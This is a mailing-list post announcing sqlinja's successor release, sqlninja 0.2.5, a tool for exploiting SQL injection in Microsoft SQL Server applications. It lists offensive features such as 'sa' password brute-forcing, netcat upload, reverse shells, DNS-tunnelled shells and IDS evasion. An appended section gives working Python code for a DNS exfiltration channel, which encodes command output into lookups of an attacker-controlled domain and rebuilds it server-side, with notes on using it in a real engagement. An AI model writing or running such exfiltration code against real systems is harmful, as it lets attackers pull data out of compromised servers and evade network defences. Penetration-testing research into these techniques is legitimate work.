begood

sqlninja 0.2.5 released!

Hello security enthusiasts,

It's been 2 years, but a new version of sqlninja is out at Sourceforge!

Introduction

============

Sqlninja is a tool to exploit SQL Injection vulnerabilities on a web
application that uses Microsoft SQL Server as its back-end. Its main
goal is to provide interactive access to the vulnerable DB server,
even in a very hostile environment. It should be used by penetration
testers to help automate the process of taking over a DB Server when
a SQL Injection vulnerability has been discovered. It is written in
Perl, it is released under the GPLv2, and so far it has been successfully
tested on:

- Linux
- FreeBSD
- Mac OS X

You can find it, together with a flash demo of its features, at the
address http://sqlninja.sourceforge.net

What's new

==========

# Proxy support (it was about time!)
# No more 64 KB limit in upload mode
# Upload mode is also massively faster
# Privilege escalation through token kidnapping (kudos to Cesar Cerrudo)
# Other minor improvements

What's not so new

=================

# Fingerprint of the remote SQL Server (version, user performing the
  queries, user privileges, xp_cmdshell availability, DB authentication mode)
# Bruteforce of 'sa' password (in 2 flavors: dictionary-based and
  incremental)
# Privilege escalation to sysadmin group if 'sa' password has been found
# Creation of a custom xp_cmdshell if the original one has been removed
# Upload of netcat (or any other executable) using only normal HTTP
  requests (no FTP/TFTP needed)
# TCP/UDP portscan from the target SQL Server to the attacking machine,
  in order to find a port that is allowed by the firewall of the target
  network and use it for a reverse shell
# Direct and reverse bindshell, both TCP and UDP
# DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a
  direct/reverse shell, but the DB server can resolve external hostnames
  (check the documentation for details about how this works)
# Evasion techniques to confuse a few IDS/IPS/WAF
# Integration with Metasploit3, to obtain graphical access to the
  remote DB server through a VNC server injection

Happy hacking!

--

Full Disclosure: sqlninja 0.2.5 released!

icesurfer

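The DNS-tunneled pseudo-shell in the feature list above works, in general terms, by having the compromised host leak command output through DNS lookups of hostnames under a domain the attacker controls, so that only a working resolver path is needed, not an open TCP or UDP port. The following is an added example written for this thread, not sqlninja's own code: sqlninja's actual label layout, encoding and session handling are not described in the announcement and are assumed to differ. It shows the codec side of such a channel: hex-encoding command output into RFC 1035-sized labels, numbering the queries, and reassembling them on the attacker's authoritative server while tolerating the duplicated, reordered and dropped queries a UDP resolver path produces. The `s1` session tag, the `tun.example.com` domain and the sample command output are placeholders constructed for the example.

```python
"""Codec for a DNS-tunnelled output channel (added example, not sqlninja code).

Target side:   encode_output() turns command output into hostnames to look up.
Attacker side: decode_queries() rebuilds the output from the names its
authoritative DNS server saw.  The hex labels, sequence numbers and "fin"
terminator are this example's own design, assumed, not sqlninja's wire format.
"""
import binascii

MAX_LABEL = 63      # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253      # practical limit for a textual hostname
HEX_PER_LABEL = 60  # even number of hex digits (30 bytes) that fits one label


def _labels_per_query(session: str, domain: str) -> int:
    """How many payload labels fit in one name next to the fixed overhead."""
    overhead = 5 + len(session) + 1 + len(domain)  # "<seq>." + "<session>." + domain
    budget = MAX_NAME - overhead
    n = budget // (HEX_PER_LABEL + 1)              # +1 for the dot after each label
    if n < 1:
        raise ValueError("domain/session too long to carry any payload")
    return n


def encode_output(data: bytes, session: str, domain: str) -> list:
    """Split data into numbered names: <seq>.<hex>[.<hex>...].<session>.<domain>.

    A final 'fin.<count>' name tells the receiver how many chunks to expect,
    so chunks dropped by the resolver path are detected rather than ignored.
    """
    hexdata = binascii.hexlify(data).decode()
    per_query = _labels_per_query(session, domain) * HEX_PER_LABEL
    chunks = [hexdata[i:i + per_query] for i in range(0, len(hexdata), per_query)]
    if len(chunks) > 0xFFFF:
        raise ValueError("output too large for a 16-bit sequence number")
    names = []
    for seq, chunk in enumerate(chunks):
        labels = [chunk[j:j + HEX_PER_LABEL] for j in range(0, len(chunk), HEX_PER_LABEL)]
        names.append(f"{seq:04x}.{'.'.join(labels)}.{session}.{domain}")
    names.append(f"fin.{len(chunks):04x}.{session}.{domain}")
    return names


def decode_queries(queries, session: str, domain: str) -> bytes:
    """Reassemble output from the query names an authoritative server observed.

    Unrelated names are ignored, duplicate queries (resolver retries) are
    collapsed, arrival order does not matter, and a missing chunk raises
    instead of silently yielding truncated output.
    """
    suffix = f".{session}.{domain}".lower()
    parts = {}
    total = None
    for q in queries:
        q = q.rstrip(".").lower()
        if not q.endswith(suffix):
            continue                                # noise: not our channel
        labels = q[:-len(suffix)].split(".")
        try:
            if labels[0] == "fin" and len(labels) == 2:
                total = int(labels[1], 16)
            else:
                parts.setdefault(int(labels[0], 16), "".join(labels[1:]))
        except ValueError:
            continue                                # malformed label, skip it
    if total is None:
        raise ValueError("terminator never seen; channel incomplete")
    missing = [i for i in range(total) if i not in parts]
    if missing:
        raise ValueError(f"chunks lost in transit: {missing}")
    return binascii.unhexlify("".join(parts[i] for i in range(total)))


if __name__ == "__main__":
    # Constructed sample output, not a real capture.
    sample = b"Microsoft Windows [Version 5.2.3790]\r\n" * 10
    names = encode_output(sample, "s1", "tun.example.com")
    # Simulate a lossy, reordering resolver path with retries and unrelated traffic.
    seen = names[::-1] + names[:2] + ["www.example.com"]
    assert decode_queries(seen, "s1", "tun.example.com") == sample
    print(f"{len(sample)} bytes carried in {len(names) - 1} lookups, first: {names[0][:40]}...")
```

On a real engagement the target side would be a loop of `nslookup`-style lookups launched through whatever command execution the injection gives you, and the attacker side reads the names from the query log of a nameserver authoritative for the domain; the channel is slow and noisy, which is why the decoder has to treat duplicates, reordering and loss as normal rather than exceptional.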
